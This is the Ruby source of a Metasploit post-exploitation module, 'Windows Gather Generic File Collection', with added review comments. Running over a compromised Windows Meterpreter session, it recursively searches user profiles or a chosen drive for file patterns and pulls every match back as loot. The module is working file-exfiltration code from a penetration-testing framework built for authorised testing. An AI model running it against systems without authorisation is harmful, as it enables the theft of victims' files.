GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/enum_files.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
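# Post module for a Windows Meterpreter session: searches the target's
# filesystem for file names matching FILE_GLOBS and stores each match as loot.
#
# Review notes:
# * Every match is read in full (read_file) and handed to store_loot, so the
#   amount of data pulled back is bounded only by what the glob matches; this
#   module applies no size or count limit.
# * 'SideEffects' is declared empty. Nothing here writes to the target, but the
#   recursive search and the per-file reads are still observable on the host
#   (for example through object-access auditing or EDR file telemetry, where
#   those are enabled).
# * With SEARCH_FROM unset, the search root is the user-profile directory on
#   the system drive, chosen by Windows build number.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::FileSystem
  include Msf::Post::Windows::Version
  include Msf::Auxiliary::Report

  # Registers module metadata and the two user-facing options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Generic File Collection',
        'Description' => %q{
          This module downloads files recursively based on the FILE_GLOBS option.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          '3vi1john <Jbabio[at]me.com>',
          'RageLtMan <rageltman[at]sempervictus>'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_search
              stdapi_railgun_api
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('SEARCH_FROM', [ false, 'Search from a specific location. Ex. C:\\']),
        OptString.new('FILE_GLOBS', [ true, 'The file pattern to search for in a filename', '*.config'])
      ]
    )
  end

  # Searches one root for +file_type+ and stores every readable hit as loot.
  #
  # @param location [String, nil] SEARCH_FROM value already validated by #run;
  #   when nil, the user-profile root for the detected Windows version is used
  # @param file_type [String] a single pattern taken from FILE_GLOBS
  # @return [Object] the search result list (not used by #run)
  def download_files(location, file_type)
    sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
    profile_path_old = sysdriv + '\\Documents and Settings\\'
    profile_path_new = sysdriv + '\\Users\\'

    version = get_version_info
    if location
      print_status("Searching #{location}")
      search_root = location
    elsif version.build_number < Msf::WindowsVersion::Vista_SP0
      print_status("Searching #{profile_path_old} through windows user profile structure")
      search_root = profile_path_old
    else
      # For systems such as: Windows 7|Windows Vista|2008
      print_status("Searching #{profile_path_new} through windows user profile structure")
      search_root = profile_path_new
    end

    # Third argument requests a recursive search (see the module Description);
    # -1 is presumably "no timeout" -- confirm against the search API.
    getfile = client.fs.file.search(search_root, file_type, true, -1)

    getfile.each do |file|
      filename = "#{file['path']}\\#{file['name']}"
      data = read_file(filename)

      # read_file comes from the Msf::Post::File mixin (not shown here). Guard
      # against a nil result so a failed read is not recorded as a saved file.
      if data.nil?
        print_error("Could not read #{filename}, skipping")
        next
      end

      print_status("Downloading #{filename}")
      p = store_loot('host.files', 'application/octet-stream', session, data, file['name'], filename)
      print_good("#{file['name']} saved as: #{p}")
    end
  end

  # Validates SEARCH_FROM, then runs one search per comma-separated FILE_GLOBS
  # entry.
  #
  # @return [void]
  def run
    location = datastore['SEARCH_FROM']

    # When the location is set, make sure we have a valid path format.
    # \A anchors at the start of the string (^ would also match after a
    # newline), and the separator class is exactly backslash or slash -- the
    # earlier [\\|/] form also accepted a literal '|'.
    drive_match = location&.match(%r{\A([a-z]):[\\/]}i)
    if location && drive_match.nil?
      print_error("Invalid SEARCH_FROM option: #{location}")
      return
    end

    # Take the drive letter from this match only; when SEARCH_FROM is unset it
    # is nil rather than whatever an unrelated earlier match left behind.
    my_drive = drive_match && drive_match[1]

    # When the location option is set, make sure we have a valid drive letter.
    # The pattern accepts either case, so compare case-insensitively.
    # get_drives is defined in the FileSystem mixin (not shown here).
    drives = get_drives
    if location && drives.none? { |drive| drive.to_s.casecmp?(my_drive) }
      print_error("#{my_drive} drive is not available, please try: #{drives.inspect}")
      return
    end

    # Empty entries (e.g. from "a,,b") are dropped instead of being passed to
    # the search, whose handling of an empty pattern is not visible here.
    globs = datastore['FILE_GLOBS'].split(',').map(&:strip).reject(&:empty?)

    globs.each do |glob|
      download_files(location, glob)
    rescue ::Rex::Post::Meterpreter::RequestError => e
      # Two known, non-fatal conditions are reported and the next glob is
      # tried; anything else is re-raised unchanged.
      case e.message
      when /The device is not ready/
        print_error("#{my_drive} drive is not ready")
      when /The system cannot find the path specified/
        print_error('Path does not exist')
      else
        raise
      end
    end

    print_status('Done!')
  end
end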